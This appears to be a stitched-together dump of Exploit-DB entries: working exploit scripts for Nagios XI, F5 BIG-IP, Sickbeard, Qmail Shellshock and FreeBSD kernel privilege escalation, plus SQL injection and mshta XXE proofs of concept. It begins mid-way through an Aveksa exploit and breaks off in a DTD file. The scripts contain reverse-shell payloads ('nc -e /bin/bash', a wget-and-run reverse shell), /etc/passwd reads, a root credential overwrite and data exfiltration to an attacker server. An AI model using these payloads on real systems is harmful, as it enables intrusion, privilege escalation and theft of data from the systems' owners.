{"statements":[{"scriptLineId":"-26:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"sequence":1,"scriptClassId":17,"sourceName":"LOCAL","scriptId":"","name":"","validationStatus":0,"validationStatusMsg":"","statement":{"statementText":"U3lzdGVtLnNldFNlY3VyaXR5TWFuYWdlcihudWxsKTsKJ2lkJy5leGVjdXRlKCkudGV4dA==","statementJava":{"javaClass":"","ejb":false,"ejbVersion":"","jndiName":"","method":"","methodIsStatic":false,"returns":{"location":"system","name":""},"useInstance":false,"useInstanceObjectName":"","action":"insert"}}}],"scriptId":"-27:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"name":"SCRIPTNAME","scriptTypeId":3,"validationStatus":0,"falseMsg":"","description":"","emitEvents":false,"errorText":"","saveMethod":"Architect"}
4. Running created script:
* In the response you have result of your command
PUT /aveksaWFArchitect/scripts/execute/ HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 58
Cookie: JSESSIONID=session
Connection: close
{"id":"SCRIPTID_OF_CREATED_SCRIPT","newTransaction":false,"symbolTable":{}}
# Exploit Title: Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
# Date: 2020-04-11
# Exploit Author: Basim Alabdullah
# Vendor homepage: https://www.nagios.com
# Version: 5.6.12
# Software link: https://www.nagios.com/downloads/nagios-xi/
# Tested on: CentOS REDHAT 7.7.1908 (core)
#
# Authenticated Remote Code Execution
#
import requests
import sys
import re
uname=sys.argv[2]
upass=sys.argv[3]
ipvictim=sys.argv[1]
with requests.session() as s:
urlz=ipvictim+"/login.php"
headers = {
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.8',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Referer': ipvictim+'/index.php',
'Connection': 'keep-alive'
}
response = s.get(urlz, headers=headers)
txt=response.text
x=re.findall('var nsp_str = "(.*?)"', txt)
for xx in x:
login = {
'username':uname,
'password':upass,
'nsp':xx,
'page':'auth',
'debug':'',
'pageopt':'login',
'redirect':ipvictim+'/index.php',
'loginButton':''
}
rev=s.post(ipvictim+"/login.php",data=login , headers=headers)
cmd=s.get(ipvictim+"/includes/components/ccm/?cmd=modify&type=host&id=1&page=1",allow_redirects=True)
txt1=cmd.text
xp=re.findall('var nsp_str = "(.*?)"', txt1)
for xxp in xp:
payload = "a|{cat,/etc/passwd};#"
exploit=s.get(ipvictim+"/includes/components/xicore/export-rrd.php?host=localhost&service=Root%20Partition&start=011&end=012&step="+payload+"&type=a&nsp="+xxp)
print(exploit.text)
#!/bin/bash
#
# EDB Note Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48642.zip
#
# Exploit Title: F5 BIG-IP Remote Code Execution
# Date: 2020-07-06
# Exploit Authors: Charles Dardaman of Critical Start, TeamARES
# Rich Mirch of Critical Start, TeamARES
# CVE: CVE-2020-5902
#
# Requirements:
# Java JDK
# hsqldb.jar 1.8
# ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
#
if [[ $# -ne 3 ]]
then
echo
echo "Usage: $(basename $0) <server> <localip> <localport>"
echo
exit 1
fi
server=${1?hostname argument required}
localip=${2?Locaip argument required}
port=${3?Port argument required}
if [[ ! -f $server.der ]]
then
echo "$server.der does not exist - extracting cert"
openssl s_client \
-showcerts \
-servername $server \
-connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der
keytool -import \
-alias $server \
-keystore keystore \
-storepass changeit \
-noprompt \
-file $PWD/$server.der
else
echo "$server.der already exists. skipping extraction step"
fi
java -jar ysoserial-master-SNAPSHOT.jar \
CommonsCollections6 \
"/bin/nc -e /bin/bash $localip $port" > nc.class
xxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex
if [[ ! -f f5RCE.class ]]
then
echo "Building exploit"
javac -cp hsqldb.jar f5RCE.java
fi
java -cp hsqldb.jar:. \
-Djavax.net.ssl.trustStore=keystore \
-Djavax.net.ssl.trustStorePassword=changeit \
f5RCE $server payload.hex
# Exploit Title: Sickbeard 0.1 - Remote Command Injection
# Google Dork: https://www.shodan.io/search?query=sickbeard
# Date: 2020-06-06
# Exploit Author: bdrake
# Vendor Homepage: https://sickbeard.com/
# Software Link: https://github.com/midgetspy/Sick-Beard
# Version: alpha (master) -- git : 31ceaf1b5cab1884a280fe3f4609bdc3b1fb3121
# Tested on: Fedora 32
# CVE : NA
#!/usr/bin/env python3
import requests
import sys
HOST = 'http://localhost:8081/'
# path to local video for processing
# see HOST + home/postprocess
PROCESS_DIR = '/directory/changeme'
# Auth is disabled on default installation
USERNAME = ''
PASSWORD = ''
# see "Extra Scripts" field. HOST + config/hidden/
# multiple commands can be entered separated by '|'
CMD = 'wget -t 2 -T 1 -O /tmp/reverse_shell.py http://localhost/reverse_shell.py | python /tmp/reverse_shell.py'
def post_request(url, data):
try:
requests.post(url=url, data=data, auth=(USERNAME, PASSWORD))
except requests.exceptions.RequestException as e:
print(repr(e))
sys.exit(1)
def set_extra_scripts():
data = {
'anon_redirect': 'http://dereferer.org/?',
'display_all_seasons': 'on',
'git_path': '',
'extra_scripts': CMD
}
post_request(HOST+'config/hidden/saveHidden', data)
def process_episode():
data = {
'dir': PROCESS_DIR,
'method': 'Manual',
'force_replace': 'on'
}
post_request(HOST+'home/postprocess/processEpisode', data)
def main():
try:
print('setting scripts...')
set_extra_scripts()
print('processing episode. might take a few seconds...')
process_episode()
except KeyboardInterrupt:
print('exit...')
if __name__ == '__main__':
main()
/*
FreeBSD 12.0-RELEASE x64 Kernel Exploit
Usage:
$ clang -o exploit exploit.c -lpthread
$ ./exploit
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#define _KERNEL
#include <sys/event.h>
#undef _KERNEL
#define _WANT_FILE
#include <sys/file.h>
#include <sys/filedesc.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/socket.h>
#define _WANT_SOCKET
#include <sys/socketvar.h>
#include <netinet/in.h>
#define _WANT_INPCB
#include <netinet/in_pcb.h>
#include <netinet/ip6.h>
#include <netinet6/ip6_var.h>
// #define FBSD12
#define ELF_MAGIC 0x464c457f
#define IPV6_2292PKTINFO 19
#define IPV6_2292PKTOPTIONS 25
#define TCLASS_MASTER 0x13370000
#define TCLASS_SPRAY 0x41
#define TCLASS_TAINT 0x42
#define NUM_SPRAY_RACE 0x20
#define NUM_SPRAY 0x100
#define NUM_KQUEUES 0x100
#ifdef FBSD12
#define ALLPROC_OFFSET 0x1df3c38
#else
#define ALLPROC_OFFSET 0xf01e40
#endif
#define PKTOPTS_PKTINFO_OFFSET (offsetof(struct ip6_pktopts, ip6po_pktinfo))
#define PKTOPTS_RTHDR_OFFSET (offsetof(struct ip6_pktopts, ip6po_rhinfo.ip6po_rhi_rthdr))
#define PKTOPTS_TCLASS_OFFSET (offsetof(struct ip6_pktopts, ip6po_tclass))
#define PROC_LIST_OFFSET (offsetof(struct proc, p_list))
#define PROC_UCRED_OFFSET (offsetof(struct proc, p_ucred))
#define PROC_FD_OFFSET (offsetof(struct proc, p_fd))
#define PROC_PID_OFFSET (offsetof(struct proc, p_pid))
#ifdef FBSD12
#define FILEDESC_FILES_OFFSET (offsetof(struct filedesc, fd_files))
#define FILEDESCENTTBL_OFILES_OFFSET (offsetof(struct fdescenttbl, fdt_ofiles))
#define FILEDESCENTTBL_NFILES_OFFSET (offsetof(struct fdescenttbl, fdt_nfiles))
#define FILEDESCENT_FILE_OFFSET (offsetof(struct filedescent, fde_file))
#define FILE_TYPE_OFFSET (offsetof(struct file, f_type))
#define FILE_DATA_OFFSET (offsetof(struct file, f_data))
#else
#define FILEDESC_OFILES_OFFSET (offsetof(struct filedesc, fd_ofiles))
#define FILEDESC_NFILES_OFFSET (offsetof(struct filedesc, fd_nfiles))
#define FILE_TYPE_OFFSET (offsetof(struct file, f_type))
#define FILE_DATA_OFFSET (offsetof(struct file, f_data))
#endif
#define KNOTE_FOP_OFFSET (offsetof(struct knote, kn_fop))
#define FILTEROPS_DETACH_OFFSET (offsetof(struct filterops, f_detach))
#define SOCKET_PCB_OFFSET (offsetof(struct socket, so_pcb))
#define INPCB_OUTPUTOPTS_OFFSET (offsetof(struct inpcb, in6p_outputopts))
int kqueue(void);
int kevent(int kq, const struct kevent *changelist, int nchanges,
struct kevent *eventlist, int nevents,
const struct timespec *timeout);
static uint64_t kernel_base;
static uint64_t p_ucred, p_fd;
static uint64_t kevent_addr, pktopts_addr;
static int triggered = 0;
static int kevent_sock, master_sock, overlap_sock, victim_sock;
static int spray_sock[NUM_SPRAY];
static int kq[NUM_KQUEUES];
static void hexDump(const void *data, size_t size) {
size_t i;
for(i = 0; i < size; i++) {
printf("%02hhX%c", ((char *)data)[i], (i + 1) % 16 ? ' ' : '\n');
}
printf("\n");
}
static int new_socket(void) {
return socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
}
static void build_tclass_cmsg(char *buf, int val) {
struct cmsghdr *cmsg;
cmsg = (struct cmsghdr *)buf;
cmsg->cmsg_len = CMSG_LEN(sizeof(int));
cmsg->cmsg_level = IPPROTO_IPV6;
cmsg->cmsg_type = IPV6_TCLASS;
*(int *)CMSG_DATA(cmsg) = val;
}
static int build_rthdr_msg(char *buf, int size) {
struct ip6_rthdr *rthdr;
int len;
len = ((size >> 3) - 1) & ~1;
size = (len + 1) << 3;
memset(buf, 0, size);
rthdr = (struct ip6_rthdr *)buf;
rthdr->ip6r_nxt = 0;
rthdr->ip6r_len = len;
rthdr->ip6r_type = IPV6_RTHDR_TYPE_0;
rthdr->ip6r_segleft = rthdr->ip6r_len >> 1;
return size;
}
static int get_rthdr(int s, char *buf, socklen_t len) {
return getsockopt(s, IPPROTO_IPV6, IPV6_RTHDR, buf, &len);
}
static int set_rthdr(int s, char *buf, socklen_t len) {
return setsockopt(s, IPPROTO_IPV6, IPV6_RTHDR, buf, len);
}
static int free_rthdr(int s) {
return set_rthdr(s, NULL, 0);
}
static int get_tclass(int s) {
int val;
socklen_t len = sizeof(val);
getsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &val, &len);
return val;
}
static int set_tclass(int s, int val) {
return setsockopt(s, IPPROTO_IPV6, IPV6_TCLASS, &val, sizeof(val));
}
static int get_pktinfo(int s, char *buf) {
socklen_t len = sizeof(struct in6_pktinfo);
return getsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, buf, &len);
}
static int set_pktinfo(int s, char *buf) {
return setsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, buf, sizeof(struct in6_pktinfo));
}
static int set_pktopts(int s, char *buf, socklen_t len) {
return setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, len);
}
static int free_pktopts(int s) {
return set_pktopts(s, NULL, 0);
}
static uint64_t leak_rthdr_ptr(int s) {
char buf[0x100];
get_rthdr(s, buf, sizeof(buf));
return *(uint64_t *)(buf + PKTOPTS_RTHDR_OFFSET);
}
static uint64_t leak_kmalloc(char *buf, int size) {
int rthdr_len = build_rthdr_msg(buf, size);
set_rthdr(master_sock, buf, rthdr_len);
#ifdef FBSD12
get_rthdr(master_sock, buf, rthdr_len);
return *(uint64_t *)(buf + 0x00);
#else
return leak_rthdr_ptr(overlap_sock);
#endif
}
static void write_to_victim(uint64_t addr) {
char buf[sizeof(struct in6_pktinfo)];
*(uint64_t *)(buf + 0x00) = addr;
*(uint64_t *)(buf + 0x08) = 0;
*(uint32_t *)(buf + 0x10) = 0;
set_pktinfo(master_sock, buf);
}
static int find_victim_sock(void) {
char buf[sizeof(struct in6_pktinfo)];
write_to_victim(pktopts_addr + PKTOPTS_PKTINFO_OFFSET);
for (int i = 0; i < NUM_SPRAY; i++) {
get_pktinfo(spray_sock[i], buf);
if (*(uint64_t *)(buf + 0x00) != 0)
return i;
}
return -1;
}
static uint8_t kread8(uint64_t addr) {
char buf[sizeof(struct in6_pktinfo)];
write_to_victim(addr);
get_pktinfo(victim_sock, buf);
return *(uint8_t *)buf;
}
static uint16_t kread16(uint64_t addr) {
char buf[sizeof(struct in6_pktinfo)];
write_to_victim(addr);
get_pktinfo(victim_sock, buf);
return *(uint16_t *)buf;
}
static uint32_t kread32(uint64_t addr) {
char buf[sizeof(struct in6_pktinfo)];
write_to_victim(addr);
get_pktinfo(victim_sock, buf);
return *(uint32_t *)buf;
}
static uint64_t kread64(uint64_t addr) {
char buf[sizeof(struct in6_pktinfo)];
write_to_victim(addr);
get_pktinfo(victim_sock, buf);
return *(uint64_t *)buf;
}
static void kread(void *dst, uint64_t src, size_t len) {
for (int i = 0; i < len; i++)
((uint8_t *)dst)[i] = kread8(src + i);
}
static void kwrite64(uint64_t addr, uint64_t val) {
int fd = open("/dev/kmem", O_RDWR);
if (fd >= 0) {
lseek(fd, addr, SEEK_SET);
write(fd, &val, sizeof(val));
close(fd);
}
}
static int kwrite(uint64_t addr, void *buf) {
write_to_victim(addr);
return set_pktinfo(victim_sock, buf);
}
static uint64_t find_kernel_base(uint64_t addr) {
addr &= ~(PAGE_SIZE - 1);
while (kread32(addr) != ELF_MAGIC)
addr -= PAGE_SIZE;
return addr;
}
static int find_proc_cred_and_fd(pid_t pid) {
uint64_t proc = kread64(kernel_base + ALLPROC_OFFSET);
while (proc) {
if (kread32(proc + PROC_PID_OFFSET) == pid) {
p_ucred = kread64(proc + PROC_UCRED_OFFSET);
p_fd = kread64(proc + PROC_FD_OFFSET);
printf("[+] p_ucred: 0x%lx\n", p_ucred);
printf("[+] p_fd: 0x%lx\n", p_fd);
return 0;
}
proc = kread64(proc + PROC_LIST_OFFSET);
}
return -1;
}
#ifdef FBSD12
static uint64_t find_socket_data(int s) {
uint64_t files, ofiles, fp;
int nfiles;
short type;
files = kread64(p_fd + FILEDESC_FILES_OFFSET);
if (!files)
return 0;
ofiles = files + FILEDESCENTTBL_OFILES_OFFSET;
nfiles = kread32(files + FILEDESCENTTBL_NFILES_OFFSET);
if (s < 0 || s >= nfiles)
return 0;
fp = kread64(ofiles + s * sizeof(struct filedescent) + FILEDESCENT_FILE_OFFSET);
if (!fp)
return 0;
type = kread16(fp + FILE_TYPE_OFFSET);
if (type != DTYPE_SOCKET)
return 0;
return kread64(fp + FILE_DATA_OFFSET);
}
#else
static uint64_t find_socket_data(int s) {
uint64_t ofiles, fp;
int nfiles;
short type;
ofiles = kread64(p_fd + FILEDESC_OFILES_OFFSET);
if (!ofiles)
return 0;
nfiles = kread32(p_fd + FILEDESC_NFILES_OFFSET);
if (s < 0 || s >= nfiles)
return 0;
fp = kread64(ofiles + s * sizeof(struct file *));
if (!fp)
return 0;
type = kread16(fp + FILE_TYPE_OFFSET);
if (type != DTYPE_SOCKET)
return 0;
return kread64(fp + FILE_DATA_OFFSET);
}
#endif
static uint64_t find_socket_pcb(int s) {
uint64_t f_data;
f_data = find_socket_data(s);
if (!f_data)
return 0;
return kread64(f_data + SOCKET_PCB_OFFSET);
}
static uint64_t find_socket_pktopts(int s) {
uint64_t in6p;
in6p = find_socket_pcb(s);
if (!in6p)
return 0;
return kread64(in6p + INPCB_OUTPUTOPTS_OFFSET);
}
static void cleanup(void) {
uint64_t master_pktopts, overlap_pktopts, victim_pktopts;
master_pktopts = find_socket_pktopts(master_sock);
overlap_pktopts = find_socket_pktopts(overlap_sock);
victim_pktopts = find_socket_pktopts(victim_sock);
kwrite64(master_pktopts + PKTOPTS_PKTINFO_OFFSET, 0);
kwrite64(overlap_pktopts + PKTOPTS_RTHDR_OFFSET, 0);
kwrite64(victim_pktopts + PKTOPTS_PKTINFO_OFFSET, 0);
}
static void escalate_privileges(void) {
char buf[sizeof(struct in6_pktinfo)];
*(uint32_t *)(buf + 0x00) = 0; // cr_uid
*(uint32_t *)(buf + 0x04) = 0; // cr_ruid
*(uint32_t *)(buf + 0x08) = 0; // cr_svuid
*(uint32_t *)(buf + 0x0c) = 1; // cr_ngroups
*(uint32_t *)(buf + 0x10) = 0; // cr_rgid
kwrite(p_ucred + 4, buf);
}
static int find_overlap_sock(void) {
set_tclass(master_sock, TCLASS_TAINT);
for (int i = 0; i < NUM_SPRAY; i++) {
if (get_tclass(spray_sock[i]) == TCLASS_TAINT)
return i;
}
return -1;
}
static int spray_pktopts(void) {
for (int i = 0; i < NUM_SPRAY_RACE; i++)
set_tclass(spray_sock[i], TCLASS_SPRAY);
if (get_tclass(master_sock) == TCLASS_SPRAY)
return 1;
for (int i = 0; i < NUM_SPRAY_RACE; i++)
free_pktopts(spray_sock[i]);
return 0;
}
static void *use_thread(void *arg) {
char buf[CMSG_SPACE(sizeof(int))];
build_tclass_cmsg(buf, 0);
while (!triggered && get_tclass(master_sock) != TCLASS_SPRAY) {
set_pktopts(master_sock, buf, sizeof(buf));
#ifdef FBSD12
usleep(100);
#endif
}
triggered = 1;
return NULL;
}
static void *free_thread(void *arg) {
while (!triggered && get_tclass(master_sock) != TCLASS_SPRAY) {
free_pktopts(master_sock);
#ifdef FBSD12
if (spray_pktopts())
break;
#endif
usleep(100);
}
triggered = 1;
return NULL;
}
static int trigger_uaf(void) {
pthread_t th[2];
pthread_create(&th[0], NULL, use_thread, NULL);
pthread_create(&th[1], NULL, free_thread, NULL);
while (1) {
if (spray_pktopts())
break;
#ifndef FBSD12
usleep(100);
#endif
}
triggered = 1;
pthread_join(th[0], NULL);
pthread_join(th[1], NULL);
return find_overlap_sock();
}
static int fake_pktopts(uint64_t pktinfo) {
char buf[0x100];
int rthdr_len, tclass;
// Free master_sock's pktopts
free_pktopts(overlap_sock);
// Spray rthdr's to refill master_sock's pktopts
rthdr_len = build_rthdr_msg(buf, 0x100);
for (int i = 0; i < NUM_SPRAY; i++) {
*(uint64_t *)(buf + PKTOPTS_PKTINFO_OFFSET) = pktinfo;
*(uint32_t *)(buf + PKTOPTS_TCLASS_OFFSET) = TCLASS_MASTER | i;
set_rthdr(spray_sock[i], buf, rthdr_len);
}
tclass = get_tclass(master_sock);
// See if pktopts has been refilled correctly
if ((tclass & 0xffff0000) != TCLASS_MASTER) {
printf("[-] Error could not refill pktopts.\n");
exit(1);
}
return tclass & 0xffff;
}
static void leak_kevent_pktopts(void) {
char buf[0x800];
struct kevent kv;
EV_SET(&kv, kevent_sock, EVFILT_READ, EV_ADD, 0, 5, NULL);
// Free pktopts
for (int i = 0; i < NUM_SPRAY; i++)
free_pktopts(spray_sock[i]);
// Leak 0x800 kmalloc addr
kevent_addr = leak_kmalloc(buf, 0x800);
printf("[+] kevent_addr: 0x%lx\n", kevent_addr);
// Free rthdr buffer and spray kevents to occupy this location
free_rthdr(master_sock);
for (int i = 0; i < NUM_KQUEUES; i++)
kevent(kq[i], &kv, 1, 0, 0, 0);
// Leak 0x100 kmalloc addr
pktopts_addr = leak_kmalloc(buf, 0x100);
printf("[+] pktopts_addr: 0x%lx\n", pktopts_addr);
// Free rthdr buffer and spray pktopts to occupy this location
free_rthdr(master_sock);
for (int i = 0; i < NUM_SPRAY; i++)
set_tclass(spray_sock[i], 0);
}
int main(int argc, char *argv[]) {
uint64_t knote, kn_fop, f_detach;
int idx;
printf("[*] Initializing sockets...\n");
kevent_sock = new_socket();
master_sock = new_socket();
for (int i = 0; i < NUM_SPRAY; i++)
spray_sock[i] = new_socket();
for (int i = 0; i < NUM_KQUEUES; i++)
kq[i] = kqueue();
printf("[*] Triggering UAF...\n");
idx = trigger_uaf();
if (idx == -1) {
printf("[-] Error could not find overlap sock.\n");
exit(1);
}
// master_sock and overlap_sock point to the same pktopts
overlap_sock = spray_sock[idx];
spray_sock[idx] = new_socket();
printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
// Reallocate pktopts
for (int i = 0; i < NUM_SPRAY; i++) {
free_pktopts(spray_sock[i]);
set_tclass(spray_sock[i], 0);
}
// Fake master pktopts
idx = fake_pktopts(0);
overlap_sock = spray_sock[idx];
spray_sock[idx] = new_socket(); // use new socket so logic in spraying will be easier
printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
// Leak address of some kevent and pktopts
leak_kevent_pktopts();
// Fake master pktopts
idx = fake_pktopts(pktopts_addr + PKTOPTS_PKTINFO_OFFSET);
overlap_sock = spray_sock[idx];
printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
idx = find_victim_sock();
if (idx == -1) {
printf("[-] Error could not find victim sock.\n");
exit(1);
}
victim_sock = spray_sock[idx];
printf("[+] Victim socket: %x (%x)\n", victim_sock, idx);
printf("[+] Arbitrary R/W achieved.\n");
knote = kread64(kevent_addr + kevent_sock * sizeof(uintptr_t));
kn_fop = kread64(knote + KNOTE_FOP_OFFSET);
f_detach = kread64(kn_fop + FILTEROPS_DETACH_OFFSET);
printf("[+] knote: 0x%lx\n", knote);
printf("[+] kn_fop: 0x%lx\n", kn_fop);
printf("[+] f_detach: 0x%lx\n", f_detach);
printf("[+] Finding kernel base...\n");
kernel_base = find_kernel_base(f_detach);
printf("[+] Kernel base: 0x%lx\n", kernel_base);
printf("[+] Finding process cred and fd...\n");
find_proc_cred_and_fd(getpid());
printf("[*] Escalating privileges...\n");
escalate_privileges();
printf("[*] Cleaning up...\n");
cleanup();
printf("[+] Done.\n");
return 0;
}
## RCE:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
## Read File:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
# Exploit Title: Online Shopping Portal 3.1 - 'email' SQL Injection
# Date: 2020-07-06
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/shopping-portal-free-download/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7393
# Version: V3.1
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)
Info:
-----
[+] Attacker can change all user's password from the forgot-password.php page and login to their account.
Vulnerable File:
----------------
/forgot-password.php
Vulnerable Code:
-----------------
line 8: $email=$_POST['email'];
Vulnerable Issue:
-----------------
$email=$_POST['email']; has no sanitization
POC:
----
import requests
url = "http://localhost:80/shopping/forgot-password.php"
password = "gh1mau"
payload = "email=saya%40saya.com' or '1'='1'#&contact=1234&password=" + password + "&confirmpassword=" + password + "&change="
headers = {
"Origin": "http://localhost",
"Cookie": "PHPSESSID=pq2dc9oja60slrifcfjuq7vhf0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Connection": "close",
"Referer": "http://localhost/shopping/forgot-password.php",
"Host": "localhost",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"Accept-Language": "en-US,en;q=0.5",
"Content-Length": "96",
"Content-Type": "application/x-www-form-urlencoded"
}
response = requests.request("POST", url, data=payload, headers=headers)
print("[+] Try login with password : " + password)
# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
# Date: 2020-06-17
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Vendor Homepage: https://joomsky.com/
# Software Link: https://joomsky.com/products/js-jobs-pro.html
# Change Log (Update) : https://joomsky.com/products/js-jobs.html
# Version: 1.3.0
# Tested on: Kali Linux - Apache2
Vulnerable param: sortby
-------------------------------------------------------------------------
POST /joomla/administrator/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/administrator/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1
js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1
-------------------------------------------------------------------------
sqlmap poc:
sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby
# Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection
# Date: 2020-07-03
# Exploit Author: 1F98D
# Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
# Version: Qmail 1.03
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2014-6271
# References:
# http://seclists.org/oss-sec/2014/q3/649
# https://lists.gt.net/qmail/users/138578
#
# Qmail is vulnerable to a Shellshock vulnerability due to lack of validation
# in the MAIL FROM field.
#
#!/usr/local/bin/python3
from socket import *
import sys
if len(sys.argv) != 4:
print('Usage {} <target ip> <email adress> <command>'.format(sys.argv[0]))
print("E.g. {} 127.0.0.1 'root@debian' 'touch /tmp/x'".format(sys.argv[0]))
sys.exit(1)
TARGET = sys.argv[1]
MAILTO = sys.argv[2]
CMD = sys.argv[3]
s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 25))
res = s.recv(1024)
if 'ESMTP' not in str(res):
print('[!] No ESMTP detected')
print('[!] Received {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] ESMTP detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error connecting, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Connected, sending payload')
s.send(bytes("MAIL FROM:<() {{ :; }}; {}>\r\n".format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error sending payload, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Payload sent')
s.send(bytes('RCPT TO:<{}>\r\n'.format(MAILTO), 'utf-8'))
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
# Exploit Title: Microsoft Windows mshta.exe 2019 - XML External Entity Injection
# Date: 2020-07-07
# Exploit Author: hyp3rlinx
# Vendor homepage: https://www.microsofft.com/
# CVE: N/A
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MSHTA-HTA-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows MSHTA.EXE .HTA File
An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more
scripting languages supported by Internet Explorer, such as VBScript or JScript. The HTML is used to generate the
user interface, and the scripting language is used for the program logic. An HTA executes without the constraints
of the internet browser security model; in fact, it executes as a "fully trusted" application.
[Vulnerability Type]
XML External Entity Injection
[Impact]
Information disclosure, Recon
[CVE Reference]
N/A
[Security Issue]
Windows mshta.exe allows processing of XML External Entitys, this can result in local data-theft and or program reconnaissance upon opening
specially crafted HTA files. From an attacker perspective, since we are not dependent on scripting languages like Javascript, VBScript or
WScript.Shell, we may have better chances at subverting endpoint protection systems as we are only using XML markup.
HTA exploits found online typically show code execution, with reliance on ActiveX Objects and scripting engines and hence are more
easily detected by security products. Many of these exploits also use payload obfuscation techniques for stealth. However, I found nothing
publicly documented that leverages XML injection targeting the mshta.exe HTA file-type.
Yea I know, no code execution. However, we get stealthy data theft with recon capabilities. Armed with this info, we can more accurately
target potential software vulnerabilities at a later date from info gathering a systems program installations. Usually, this type of recon
is seen in first-stage malware infections using the Windows CreateToolhelp32Snapshot API.
Therefore, since theres no documented HTA exploits using XXE attacks for this file type, I release the advisory.
Successfully tested on Windows 10 and Windows Servers 2016, 2019.
[Exploit/POC]
Multi program recon and check if running in a Virtual Machine all in a single HTA file, change IP accordingly.
1) "Doit.hta"
<?xml version="1.0"?>
<!-- VMware check -->
<xml>
<!DOCTYPE xxe4u [
<!ENTITY % file SYSTEM "C:\ProgramData\VMware\VMware Tools\manifest.txt">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/datatears.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
<!-- Notepad++ install check -->
<xml>
<!DOCTYPE xxe4u [
<!ENTITY % file SYSTEM "C:\Program Files (x86)\Notepad++\change.log">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/datatears.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
<!-- McAfee AV install check -->
<xml>
<!DOCTYPE xxe4u [
<!ENTITY % file SYSTEM "C:\ProgramData\McAfee\MCLOGS\VSCoreVersionInfo.txt">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/datatears.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
<HTA:APPLICATION WINDOWSTATE="minimize" />
2) The "datatears.dtd" DTD file hosted on attackers server.
<?xml version="1.0" encoding="UTF-8"?>
